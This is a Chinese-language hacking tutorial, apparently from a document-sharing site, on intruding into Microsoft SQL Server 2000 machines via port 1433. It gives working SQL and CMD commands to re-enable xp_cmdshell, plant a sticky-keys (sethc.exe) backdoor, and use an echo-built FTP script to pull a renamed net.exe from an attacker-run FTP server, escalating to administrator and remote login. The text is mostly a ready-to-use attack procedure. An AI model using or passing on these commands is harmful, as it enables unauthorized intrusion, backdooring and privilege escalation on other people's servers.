利用SQL之1433端口巧妙入侵服务器
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
利用SQL之1433端口巧妙入侵服务器
利用1433端口提权
相信大家扫到很多1433 都提示用net net1 提权都说拒绝访问!且又无法上传!今天给大家针对Net没权限情况的提权方法;
1、未找到储存过程!那就来修复下吧!
用到SQL语句:
xp_cmdshell新的恢复办法
第一步先删除:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
第二步恢复:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
直接恢复,不管sp_addextendedproc是不是存在
图1
2、修复好了!又出现问题了!xplog70.dll被删除了!看来只有用授鱼的那修复法!图2
3、d:\应用软件\SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版\SP4\x86\binn\xplog70.dLL
找到了哈哈!
图3
4、恢复!
用到SQL语句:
第一
exec sp_dropextendedproc 'xp_cmdshell'
第二
dbcc addextendedproc ("xp_cmdshell","d:\应用软件\SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版\SP4\x86\binn\xplog70.dLL")
恢复好了
图4
5、提下权 net net1 都拒绝访问!管理降低了权限!图5
6、于是我想到了后门提权! 居然管理也注意到了后门!写了权限!
用到CMD命令:
五shift键(前提是能执行DOS命令,并且sethc.exe没加保护)一般只要执行第一步!copy C:\WINDOWS\explorer.exe c:\windows\system32\sethc.exe
copy C:\WINDOWS\explorer.exe c:\windows\system32\dllcache\sethc.exe
图6
7、插入一点:如果DOS不能执行命令的话!那就用SQL执行替换命令!(成功率比较低!)
用到SQL语句:
利用SQL分析器开shift后门(一般只要执行第一步!然后进入后,替换自己的后门)
第一:
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o,
'copyfile',null,'C:\WINDOWS\explorer.exe' ,'c:\windows\system32\sethc.exe';
第二:
declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo,
'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; 图7
8、这里是本节的重点了!利用传马的方式提权!
首先自己架设一个FTP 或是自己已经有FTP的!
把本机的net放到FTP空间里去!随便改个名字!切记不要和net相同即可!
把FTP传马方式的语句一句一句复制执行DOS命令!
用到CMD命令:
echo open FTP> xiuxiu.txt 注意 xiuxiu.txt你可以随意改!但是要和下的相同! echo 帐号>> xxxx.txt
echo 密码>> xxxx.txt
echo binary >> xxxx.txt
echo get net的名字.exe>> xxxx.txt
echo bye >> xxxx.txt
ftp -s:xxxx.txt
del xxxx.txt. /q /f
图8
9、好了!执行下最后一条命令! 嘿嘿!发现和FTP抓鸡方式一样!有鸡来下载!图9
10、好了!最后一条命令执行成功了!返回以下数据!注意:服务器必须能上网!
图10
11、我XXxX 我自己的 net好象没加权限吧! 居然不能执行
返回了以下数据!发生系统错误5...这很多人都遇见过!
其实可以省掉一部分! 以后提权传net的时候不要传net 直接net1 因为所以!我也解释不清楚!
图11
12、嘿嘿 net1后成功了! 提权成功!
图12
13、远程登录成功图13